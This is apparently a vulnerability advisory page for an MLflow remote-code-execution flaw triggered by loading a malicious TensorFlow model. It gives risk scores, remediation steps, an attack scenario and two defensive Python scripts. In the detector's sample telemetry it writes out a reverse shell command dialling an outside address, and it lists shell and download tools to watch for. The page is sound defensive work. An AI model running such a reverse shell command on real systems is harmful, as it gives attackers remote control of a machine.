CVE-2024-37057: MLflow: RCE via malicious TensorFlow model deserialization

Severity: HIGH | PoC available | CISA SSVC: Attend
Published June 4, 2024
CISO Take

Any MLflow deployment running ≥2.0.0rc0 is vulnerable to arbitrary code execution the moment a user loads a maliciously uploaded TensorFlow model — a routine action in every ML workflow. This is a supply chain attack: one compromised upload in a shared model registry can pivot to every data scientist workstation and CI/CD runner that pulls that model. Patch immediately, restrict model upload permissions, and audit your registry for untrusted artifacts.

What is the risk?

HIGH. CVSS 8.8 understates operational risk in ML environments: loading a model from a shared registry is reflexive behaviour, not a suspicious action, so the user who triggers the payload has no reason to hesitate. MLflow's tracking server does not enforce authentication unless it is explicitly configured, so in many deployments uploading a poisoned model requires no privileges at all, and the attacker then needs only one person or one automated job to load it. Blast radius includes developer workstations, automated retraining pipelines, and inference infrastructure. The low attack complexity and wide deployment of MLflow in enterprise ML stacks make this a high-priority remediation target.

What systems are affected?

Package    Ecosystem   Vulnerable Range   Patched
MLflow     pip         >=2.0.0rc0         No patch
Package stats: 26.6K, OpenSSF 5.6, 655 dependents, pushed 4d ago, 31% patched, ~51d to patch

Do you use MLflow? You're affected.

How severe is it?

CVSS 3.1
8.8 / 10
EPSS
0.6%
chance of exploitation in 30 days
Higher than 45% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): Required
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High

What should I do?

6 steps
  1. PATCH

    Upgrade MLflow to the fixed version named in the HiddenLayer advisory. The package table above lists no patched release, so until one is confirmed treat the remaining steps as the primary controls rather than as defence in depth.

  2. ACCESS CONTROL

    Treat model registry write access like code repository write access — require authentication, MFA, and role-based permissions for model uploads.

  3. AUDIT

    Review all TensorFlow models uploaded post-2024-01-01 for unexpected files, Lambda layers, or custom ops in SavedModel directories.

  4. SANDBOX

    Load models in isolated containers or VMs with no outbound network access and read-only filesystem mounts for all automated pipeline jobs.

  5. SIGN AND VERIFY

    Implement model artifact signing (e.g., Sigstore/cosign) and verify checksums before loading in any pipeline.

  6. DETECT

    Alert on process spawning (shells, curl, wget, netcat) or outbound network connections originating from model loading processes.
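The AUDIT and SIGN AND VERIFY steps combine naturally into a single gate that runs before any call to mlflow.tensorflow.load_model. The script below is an added example and not MLflow's or HiddenLayer's code. It assumes an MLflow-style artifact directory (an MLmodel file plus model files), that any Keras layer configuration is available as JSON (for instance the config.json inside a .keras archive, extracted beforehand), and that the producer published a SHA-256 manifest of the artifact and signed it out of band (for example with cosign). The file allowlist and the sample artifact are constructed for the demo; SavedModel protobufs are not parsed, so this is a cheap first gate rather than a complete scanner.

```python
"""Pre-load gate for the AUDIT and SIGN AND VERIFY steps.

Added example, not MLflow's or HiddenLayer's code. Assumptions: the artifact is
an MLflow-style directory (MLmodel file plus model files); any Keras layer
configuration present is JSON; the producer published a SHA-256 manifest of
the artifact and signed it out of band. SavedModel protobufs are not parsed.
"""
import hashlib
import json
import tempfile
from pathlib import Path

# File inventory an MLflow TensorFlow/Keras artifact is expected to have (assumption).
ALLOWED_NAMES = {"MLmodel", "conda.yaml", "python_env.yaml", "requirements.txt"}
ALLOWED_SUFFIXES = {".pb", ".json", ".h5", ".keras", ".index", ".txt", ".yaml", ".yml"}
ALLOWED_PREFIXES = ("variables.data-",)
# Layer classes that carry executable Python: Lambda serialises its function body.
DANGEROUS_LAYER_CLASSES = {"Lambda"}


def iter_layer_configs(node):
    """Recursively yield every dict that looks like a Keras object config."""
    if isinstance(node, dict):
        if "class_name" in node:
            yield node
        for value in node.values():
            yield from iter_layer_configs(value)
    elif isinstance(node, list):
        for item in node:
            yield from iter_layer_configs(item)


def scan_keras_config(config):
    """Flag Lambda layers and classes that do not come from the keras namespace."""
    findings = []
    for obj in iter_layer_configs(config):
        cls = obj.get("class_name", "")
        module = obj.get("module") or ""
        registered = obj.get("registered_name")
        name = obj["config"].get("name", "?") if isinstance(obj.get("config"), dict) else "?"
        if cls in DANGEROUS_LAYER_CLASSES:
            findings.append(f"Lambda layer '{name}' carries serialised Python code")
        elif registered or (module and not module.startswith("keras")):
            findings.append(f"custom class {module}.{cls} (registered_name={registered})")
    return findings


def scan_files(model_dir):
    """Flag files outside the allowlist and scan every JSON config found."""
    model_dir = Path(model_dir)
    findings = []
    for path in sorted(p for p in model_dir.rglob("*") if p.is_file()):
        rel = path.relative_to(model_dir).as_posix()
        allowed = (path.name in ALLOWED_NAMES or path.suffix in ALLOWED_SUFFIXES
                   or path.name.startswith(ALLOWED_PREFIXES))
        if not allowed:
            findings.append(f"unexpected file {rel}")
        if path.suffix == ".json":
            try:
                findings += [f"{rel}: {f}" for f in scan_keras_config(json.loads(path.read_text()))]
            except ValueError as exc:
                findings.append(f"{rel}: unreadable JSON ({exc})")
    return findings


def build_manifest(model_dir):
    """Producer side: SHA-256 of every file, keyed by relative POSIX path."""
    model_dir = Path(model_dir)
    return {p.relative_to(model_dir).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in sorted(model_dir.rglob("*")) if p.is_file()}


def verify_manifest(model_dir, expected):
    """Consumer side: any added, missing or changed file fails the check."""
    actual = build_manifest(model_dir)
    problems = []
    for rel in sorted(set(actual) | set(expected)):
        if rel not in expected:
            problems.append(f"file not in manifest: {rel}")
        elif rel not in actual:
            problems.append(f"file missing: {rel}")
        elif actual[rel] != expected[rel]:
            problems.append(f"hash mismatch: {rel}")
    return problems


def gate(model_dir, expected_manifest):
    """Return (ok, findings); load the model only when ok is True."""
    findings = verify_manifest(model_dir, expected_manifest) + scan_files(model_dir)
    return not findings, findings


def run_demo():
    """Constructed artifact (not a real model): gate it clean, then tampered."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "MLmodel").write_text("flavors:\n  tensorflow:\n    saved_model_dir: model\n")
        cfg = {"class_name": "Sequential", "module": "keras", "config": {"name": "clean", "layers": [
            {"class_name": "Dense", "module": "keras.layers", "config": {"name": "d1", "units": 8}}]}}
        (root / "config.json").write_text(json.dumps(cfg))
        manifest = build_manifest(root)            # published (and signed) by the producer
        ok_clean, _ = gate(root, manifest)
        # Attacker swaps in a Lambda layer and drops a helper; the manifest is now stale.
        cfg["config"]["layers"].append({"class_name": "Lambda", "module": "keras.layers",
                                        "config": {"name": "payload", "function": "<marshalled code>"}})
        (root / "config.json").write_text(json.dumps(cfg))
        (root / "helper.py").write_text("import os\n")
        ok_bad, findings = gate(root, manifest)
    return ok_clean, ok_bad, findings


if __name__ == "__main__":
    for line in run_demo()[2]:
        print("BLOCKED:", line)
```

The manifest check catches the tampering regardless of what the scanner understands, which is why it runs first; the scanner then explains why. Verify the signature on the manifest itself before trusting it, otherwise an attacker with registry write access simply republishes a matching manifest alongside the poisoned artifact.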

What does CISA's SSVC say?

Decision Attend
Exploitation poc
Automatable No
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Art.9 - Risk management system
ISO 42001
A.10.1 - Third-party and supply chain AI risk A.6.1.5 - AI system security controls
NIST AI RMF
GOVERN-6.1 - AI supply chain risk policies MANAGE-2.2 - AI risk treatment mechanisms
OWASP LLM Top 10
LLM03 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2024-37057?

Any MLflow deployment running ≥2.0.0rc0 is vulnerable to arbitrary code execution the moment a user loads a maliciously uploaded TensorFlow model — a routine action in every ML workflow. This is a supply chain attack: one compromised upload in a shared model registry can pivot to every data scientist workstation and CI/CD runner that pulls that model. Patch immediately, restrict model upload permissions, and audit your registry for untrusted artifacts.

Is CVE-2024-37057 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2024-37057, increasing the risk of exploitation.

How to fix CVE-2024-37057?

1. PATCH: Upgrade MLflow immediately — consult the HiddenLayer advisory for the minimum safe version. 2. ACCESS CONTROL: Treat model registry write access like code repository write access — require authentication, MFA, and role-based permissions for model uploads. 3. AUDIT: Review all TensorFlow models uploaded post-2024-01-01 for unexpected files, Lambda layers, or custom ops in SavedModel directories. 4. SANDBOX: Load models in isolated containers or VMs with no outbound network access and read-only filesystem mounts for all automated pipeline jobs. 5. SIGN AND VERIFY: Implement model artifact signing (e.g., Sigstore/cosign) and verify checksums before loading in any pipeline. 6. DETECT: Alert on process spawning (shells, curl, wget, netcat) or outbound network connections originating from model loading processes.

What systems are affected by CVE-2024-37057?

This vulnerability affects the following AI/ML architecture patterns: model registry, training pipelines, model serving, MLOps platforms, model evaluation pipelines.

What is the CVSS score for CVE-2024-37057?

CVE-2024-37057 has a CVSS v3.1 base score of 8.8 (HIGH). The EPSS exploitation probability is 0.62%.

What is the AI security impact?

Affected AI Architectures

model registry, training pipelines, model serving, MLOps platforms, model evaluation pipelines

MITRE ATLAS Techniques

AML.T0010.003 Model
AML.T0011.000 Unsafe AI Artifacts
AML.T0018.002 Embed Malware
AML.T0049 Exploit Public-Facing Application
AML.T0058 Publish Poisoned Models

Compliance Controls Affected

EU AI Act: Art.9
ISO 42001: A.10.1, A.6.1.5
NIST AI RMF: GOVERN-6.1, MANAGE-2.2
OWASP LLM Top 10: LLM03

What are the technical details?

Original Advisory

Deserialization of untrusted data can occur in versions of the MLflow platform running version 2.0.0rc0 or newer, enabling a maliciously uploaded Tensorflow model to run arbitrary code on an end user’s system when interacted with.

Exploitation Scenario

Adversary obtains write access to a shared MLflow instance, either via compromised contributor credentials, an exposed unauthenticated MLflow UI, or a malicious insider. They craft a TensorFlow SavedModel containing a malicious custom layer or serialized Python object that executes a reverse shell payload during model load. The model is published under a plausible name (e.g., 'gpt2-finetuned-internal-v3') with a version number slightly higher than the current production model's. An automated retraining pipeline, or a data scientist comparing candidate models, pulls and loads the artifact, triggering execution. The attacker gains a foothold on the runner or workstation, exfiltrates cloud provider credentials, training data, and proprietary model weights, then pivots laterally into the MLOps infrastructure.
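The reverse shell in this scenario, and the DETECT step in the remediation list, both come down to the same host-level signal: a process that is loading a model spawns a shell or downloader, or opens an outbound connection it does not need. The detector below is an added example and not MLflow's or HiddenLayer's code. Its event feed is a constructed, simplified process and network telemetry format (one JSON object per line with type, pid, ppid, exe, cmdline and dst fields) that stands in for whatever an EDR, auditd or eBPF pipeline actually emits; the loader markers, the allowed egress host and the addresses in the sample are assumptions.

```python
"""Detection for the DETECT step: a model-loading process spawning a shell or
downloader, or opening an outbound connection it has no business opening.

Added example, not MLflow's or HiddenLayer's code. The event feed is a
constructed, simplified telemetry format; map its fields onto what your EDR,
auditd or eBPF pipeline really produces. Hosts and addresses are illustrative.
"""
import json
import os

# A python process whose command line mentions one of these is treated as a
# model loader (assumption: adjust to your pipeline's real entry points).
LOADER_MARKERS = ("mlflow", "tensorflow", "keras")
# Children a model load should never produce.
SUSPICIOUS_CHILDREN = {"sh", "bash", "dash", "zsh", "curl", "wget", "nc", "ncat", "netcat"}
# Egress a model load legitimately needs: the registry / artifact store (assumption).
ALLOWED_EGRESS = {"mlflow.internal:5000"}


def parse_events(text):
    """One JSON object per non-empty line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def is_model_loader(ev):
    exe = os.path.basename(ev.get("exe", ""))
    cmd = ev.get("cmdline", "").lower()
    return exe.startswith("python") and any(m in cmd for m in LOADER_MARKERS)


def detect(events):
    """Return alerts. `tracked` maps every pid in a loader's process tree to the
    root loader pid, so a payload that re-execs sh -> bash is still attributed
    to the model load that started it."""
    tracked = {}
    alerts = []
    for ev in events:
        kind = ev.get("type")
        if kind == "process_start":
            pid, ppid = ev["pid"], ev["ppid"]
            if ppid in tracked:
                tracked[pid] = tracked[ppid]
                child = os.path.basename(ev.get("exe", ""))
                if child in SUSPICIOUS_CHILDREN:
                    alerts.append({"rule": "model_loader_spawned_shell_or_downloader", "pid": pid,
                                   "root_pid": tracked[pid], "detail": f"{child}: {ev.get('cmdline', '')}"})
            elif is_model_loader(ev):
                tracked[pid] = pid
        elif kind == "net_connect":
            pid = ev["pid"]
            if pid in tracked and ev.get("dst") not in ALLOWED_EGRESS:
                alerts.append({"rule": "model_loader_unexpected_egress", "pid": pid,
                               "root_pid": tracked[pid], "detail": ev.get("dst")})
        elif kind == "process_exit":
            tracked.pop(ev["pid"], None)
    return alerts


# Constructed sample: a data scientist loads the poisoned model; the artifact download
# to the registry is allowed, the reverse shell that follows is not. The curl from an
# unrelated parent (pid 900) is a benign control that must not alert.
SAMPLE_EVENTS = """
{"type":"process_start","pid":4120,"ppid":3001,"exe":"/usr/bin/python3","cmdline":"python3 compare_models.py --tracking-uri http://mlflow.internal:5000 --model models:/gpt2-finetuned-internal-v3/7"}
{"type":"net_connect","pid":4120,"dst":"mlflow.internal:5000"}
{"type":"process_start","pid":5210,"ppid":900,"exe":"/usr/bin/curl","cmdline":"curl -s https://pypi.org/simple/"}
{"type":"process_start","pid":4131,"ppid":4120,"exe":"/bin/sh","cmdline":"sh -c 'bash -i >& /dev/tcp/203.0.113.7/4444 0>&1'"}
{"type":"process_start","pid":4132,"ppid":4131,"exe":"/bin/bash","cmdline":"bash -i"}
{"type":"net_connect","pid":4132,"dst":"203.0.113.7:4444"}
{"type":"process_exit","pid":4120}
"""


if __name__ == "__main__":
    for alert in detect(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

The process-tree attribution is the part worth keeping when you port this to a real pipeline: a rule that only looks at the immediate parent misses the second-stage bash, and the egress rule is what still fires when the payload avoids a shell and dials out from Python directly.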

Weaknesses (CWE)

CWE-502 — Deserialization of Untrusted Data: The product deserializes untrusted data without sufficiently ensuring that the resulting data will be valid.

  • [Architecture and Design, Implementation] If available, use the signing/sealing features of the programming language to assure that deserialized data has not been tainted. For example, a hash-based message authentication code (HMAC) could be used to ensure that data has not been modified.
  • [Implementation] When deserializing data, populate a new object rather than just deserializing. The result is that the data flows through safe input validation and that the functions are safe.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Timeline

Published
June 4, 2024
Last Modified
February 3, 2025
First Seen
June 4, 2024
